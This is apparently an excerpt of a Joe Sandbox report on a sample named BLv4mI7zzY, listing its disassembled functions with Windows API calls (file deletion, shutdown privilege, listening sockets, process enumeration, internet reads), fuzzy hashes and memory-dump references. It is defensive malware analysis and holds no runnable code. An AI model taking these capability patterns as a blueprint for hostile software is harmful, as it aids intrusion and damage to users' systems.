                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID: 3cD$_D
                                                              • API String ID: 674341424-3978952248
                                                              • Opcode ID: 64e3949e1dbd2a75d46e1a1ee1c537a75353abb91a814583fb668a31556e0fe9
                                                              • Instruction ID: bdf3aa83ff47b9f9662bf26db534db95e67b2b8f9b204d68e5997f657127be1d
                                                              • Opcode Fuzzy Hash: 64e3949e1dbd2a75d46e1a1ee1c537a75353abb91a814583fb668a31556e0fe9
                                                              • Instruction Fuzzy Hash: 38229C716083009FD724DF14C881BAFB7E5AF88714F10891EF89A97291DB79ED05CB9A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 5b04bcb8e48cf1603a958ea3b545425d60f39c7ca342db6d801b34357abdf38d
                                                              • Instruction ID: 0136ee98f4a995e8d0af7060850e90faefbab4dbcf511b793edbcfdfd68d274c
                                                              • Opcode Fuzzy Hash: 5b04bcb8e48cf1603a958ea3b545425d60f39c7ca342db6d801b34357abdf38d
                                                              • Instruction Fuzzy Hash: 8B12AC70A00609DFDF04EFA5D981AAEB3F5FF48304F10452AE846E7291EB39AD15CB59
                                                              APIs
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                                • Part of subcall function 00494A31: GetFileAttributesW.KERNEL32(?,0049370B), ref: 00494A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00493B89
                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00493BD9
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00493BEA
                                                              • FindClose.KERNEL32(00000000), ref: 00493C01
                                                              • FindClose.KERNEL32(00000000), ref: 00493C0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 2649000838-1173974218
                                                              • Opcode ID: 72e85ba918383ba07dcb9e6a872228571ef0bec60a7213626963ac1f7f6fd37e
                                                              • Instruction ID: d8dc1e4f01d113869d3e96425cc8a40c080520d1729869760264a11d51463df0
                                                              • Opcode Fuzzy Hash: 72e85ba918383ba07dcb9e6a872228571ef0bec60a7213626963ac1f7f6fd37e
                                                              • Instruction Fuzzy Hash: 5F31A6710083849BC700EF64C8918AFBBE8AE96319F441E2EF4D593191EB29DA0DC75B
                                                              APIs
                                                                • Part of subcall function 004887E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0048882B
                                                                • Part of subcall function 004887E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00488858
                                                                • Part of subcall function 004887E1: GetLastError.KERNEL32 ref: 00488865
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 004951F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: 1389ac64059d9f966f38854e6b9750652b5e3e2ed8a67d4c3d24748c45942284
                                                              • Instruction ID: fb276f45c7437fb82601d653e092b5351883d3a9bf588808ccbaadafda7ad656
                                                              • Opcode Fuzzy Hash: 1389ac64059d9f966f38854e6b9750652b5e3e2ed8a67d4c3d24748c45942284
                                                              • Instruction Fuzzy Hash: 720147317916012BEF2D2378AC8AFBB7A589B05741F3009BBF807E21D2D9691C018B9D
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004A62DC
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A62EB
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 004A6307
                                                              • listen.WSOCK32(00000000,00000005), ref: 004A6316
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A6330
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 004A6344
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: 95fe9e0f279773fe742e64cdd0403bff4b4be84b68a13ff7377113734321398b
                                                              • Instruction ID: 22c7b883ae8742e6fd7b62595de6454f249df19f1eef59f3813cd826ac779985
                                                              • Opcode Fuzzy Hash: 95fe9e0f279773fe742e64cdd0403bff4b4be84b68a13ff7377113734321398b
                                                              • Instruction Fuzzy Hash: BC21D2316002009FCB10EF64CC89B6EB7A9EF59324F15426AEC1AA7391CB74AC05CB59
                                                              APIs
                                                                • Part of subcall function 00450DB6: std::exception::exception.LIBCMT ref: 00450DEC
                                                                • Part of subcall function 00450DB6: __CxxThrowException@8.LIBCMT ref: 00450E01
                                                              • _memmove.LIBCMT ref: 00480258
                                                              • _memmove.LIBCMT ref: 0048036D
                                                              • _memmove.LIBCMT ref: 00480414
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1300846289-0
                                                              • Opcode ID: 2140e960386192803087b156d50ba84f1ded330afec0d9d1411e82094013205c
                                                              • Instruction ID: 45f29d74af2ff3999dd4e101510ba26ab4fbd4f8a7b95cf934d5c4fb9e6f92b5
                                                              • Opcode Fuzzy Hash: 2140e960386192803087b156d50ba84f1ded330afec0d9d1411e82094013205c
                                                              • Instruction Fuzzy Hash: CC02F3B0A00209DBDF04DF65D9816AEBBB5EF44304F10846EE809DB352EB39DD14CB59
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 004319FA
                                                              • GetSysColor.USER32(0000000F), ref: 00431A4E
                                                              • SetBkColor.GDI32(?,00000000), ref: 00431A61
                                                                • Part of subcall function 00431290: DefDlgProcW.USER32(?,00000020,?), ref: 004312D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ColorProc$LongWindow
                                                              • String ID:
                                                              • API String ID: 3744519093-0
                                                              • Opcode ID: 7c99ac3797a09dc911c8438948c31ecba3c23df8c82202df9e6a60ed9cf56039
                                                              • Instruction ID: 4d3c14569f4ee6dd12b5db41083a41e3e1535c7f62f98e04615189e27c99275a
                                                              • Opcode Fuzzy Hash: 7c99ac3797a09dc911c8438948c31ecba3c23df8c82202df9e6a60ed9cf56039
                                                              • Instruction Fuzzy Hash: 0FA138B1106544BAE628BB294C84EBF359CDF49386F14121FF502D62B2DB2C9D42D2BF
                                                              APIs
                                                                • Part of subcall function 004A7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004A7DB6
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 004A679E
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A67C7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 004A6800
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A680D
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 004A6821
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 99427753-0
                                                              • Opcode ID: 78218cc9bb8ddd1da377c9693c06cd9a1aed396ae00b4a52984ae60e86ac50eb
                                                              • Instruction ID: 3eea943c551ce81199ced32f1d7c18ef665f4fcd0d463b1c4c324d58abd19862
                                                              • Opcode Fuzzy Hash: 78218cc9bb8ddd1da377c9693c06cd9a1aed396ae00b4a52984ae60e86ac50eb
                                                              • Instruction Fuzzy Hash: EF41E9757002006FDB50BF259C86F3E77A8DF59718F04856EF919AB3C2CA789D008B99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 5da4ff96d34a32415e7824ed71b4978bf7a552f9bfd541a97d6a4b92574d6dab
                                                              • Instruction ID: 897116ba3bd85d51b5b1eeab5d136dbae17226b8cad7d179d996eb52ee87043f
                                                              • Opcode Fuzzy Hash: 5da4ff96d34a32415e7824ed71b4978bf7a552f9bfd541a97d6a4b92574d6dab
                                                              • Instruction Fuzzy Hash: 241193317005116BD7216F269C44B9FBBD8EF447A1B55543AEC49D3341CBB89C028ABC
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004880C0
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004880CA
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004880D9
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004880E0
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004880F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 1bdfed05c46f7c5d0e35ac6c0b728090418c1d69978cd3710dcda7b0c950d654
                                                              • Instruction ID: 79b10365de94e5e8e3486bf7d69b55f0d12b009a78aa809d51c1af920b8986cb
                                                              • Opcode Fuzzy Hash: 1bdfed05c46f7c5d0e35ac6c0b728090418c1d69978cd3710dcda7b0c950d654
                                                              • Instruction Fuzzy Hash: EBF0C270200215BFEB102FA9EC8CE6B3BACEF49754B40053AF909D2260CF609C05DB64
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0049C432
                                                              • CoCreateInstance.OLE32(004C2D6C,00000000,00000001,004C2BDC,?), ref: 0049C44A
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • CoUninitialize.OLE32 ref: 0049C6B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                              • String ID: .lnk
                                                              • API String ID: 2683427295-24824748
                                                              • Opcode ID: 45906759ee55bd5b4e56c6fa622e5a2e768e082983745796de67b80fccacf2f4
                                                              • Instruction ID: 818feba47952e1ccbcf2b1bf7275d2464afe948409f7fa354146054ea12b4a5f
                                                              • Opcode Fuzzy Hash: 45906759ee55bd5b4e56c6fa622e5a2e768e082983745796de67b80fccacf2f4
                                                              • Instruction Fuzzy Hash: 47A13CB1108205AFD700EF55C881EAFB7E8EF89358F00492EF15597192DBB5EE09CB56
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00434AD0), ref: 00434B45
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00434B57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 3b4dccef4a982dd2c3de7519b0afb3be757c25e23bccc5c076cbefe684688332
                                                              • Instruction ID: 8a32a04e7db704ab49d8b0ec5992bddd280d08e45470e6f83909cc0daf9cda9d
                                                              • Opcode Fuzzy Hash: 3b4dccef4a982dd2c3de7519b0afb3be757c25e23bccc5c076cbefe684688332
                                                              • Instruction Fuzzy Hash: 36D0EC34A10712CFD7209B39DC28B86B6D4AF45351B21893A9499D6650D778F884C66C
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 004AEE3D
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 004AEE4B
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 004AEF0B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 004AEF1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                              • String ID:
                                                              • API String ID: 2576544623-0
                                                              • Opcode ID: b413e34651b1c8394fb5600a8659ee1695dc55d794d80c6120c6efd9d8dec532
                                                              • Instruction ID: 41ccc6553a74aaf92ba2f11ad0535ff8a201547e20b3b4fed157f39afa418838
                                                              • Opcode Fuzzy Hash: b413e34651b1c8394fb5600a8659ee1695dc55d794d80c6120c6efd9d8dec532
                                                              • Instruction Fuzzy Hash: A751A1B1504300AFD320EF25DC81E6BB7E8EF99714F10492EF595972A1EB74AD08CB96
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0048E628
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($|
                                                              • API String ID: 1659193697-1631851259
                                                              • Opcode ID: 31c32615d0123bb0c7e2c36f4f2ced55e8dd7f2f1ce382a6280a7d864f0b0d4a
                                                              • Instruction ID: 22b2dd8cf51e92b49bf98f3fba5adee8ae8b73a113321c8517d182a1b669106c
                                                              • Opcode Fuzzy Hash: 31c32615d0123bb0c7e2c36f4f2ced55e8dd7f2f1ce382a6280a7d864f0b0d4a
                                                              • Instruction Fuzzy Hash: 92323475A007059FDB28DF1AC48196AB7F0FF48320B15C86EE89ADB3A1E774E941CB44
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004A180A,00000000), ref: 004A23E1
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 004A2418
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: e9f574cbfea189d23631abea11875cf3f6ee2ea79886a4b653b599962debe16e
                                                              • Instruction ID: 0cdcbf05e7ce2c072d3d8187994bf3b1292e9d111cf5978293426fcf2b320c73
                                                              • Opcode Fuzzy Hash: e9f574cbfea189d23631abea11875cf3f6ee2ea79886a4b653b599962debe16e
                                                              • Instruction Fuzzy Hash: 4B413771504209BFEF10DEA9CE81EBB77BCEB52314F10406FFA00A6241DABC9E41A758
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0049B343
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0049B39D
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0049B3EA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: 27df176a4230bccca11de6534a895865efc3f2dc413fd48a8d7ab1721c083f91
                                                              • Instruction ID: cd2d5f1d38bdddb2ebe230febfbcea1e8a4d0b5683c1f016cc3888ad1ab12c32
                                                              • Opcode Fuzzy Hash: 27df176a4230bccca11de6534a895865efc3f2dc413fd48a8d7ab1721c083f91
                                                              • Instruction Fuzzy Hash: 18215E35A00108EFCB00EFA5D885AEDBBB8FF49314F1481AAE905AB351CB359D19CB55
                                                              APIs
                                                                • Part of subcall function 00450DB6: std::exception::exception.LIBCMT ref: 00450DEC
                                                                • Part of subcall function 00450DB6: __CxxThrowException@8.LIBCMT ref: 00450E01
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0048882B
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00488858
                                                              • GetLastError.KERNEL32 ref: 00488865
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: 5af37276d68c0fa827d4859e97e0489ef35df6e1c16e04dae535ae6f942b75b2
                                                              • Instruction ID: 44fd6b5978381c4223981471ae481d606672576ee99ce7c730e5d2371ed90c61
                                                              • Opcode Fuzzy Hash: 5af37276d68c0fa827d4859e97e0489ef35df6e1c16e04dae535ae6f942b75b2
                                                              • Instruction Fuzzy Hash: B911BFB2404205AFE718EFA4DC85D2BB7F8EB04311B60852EF85593212EB34BC048B64
                                                              APIs
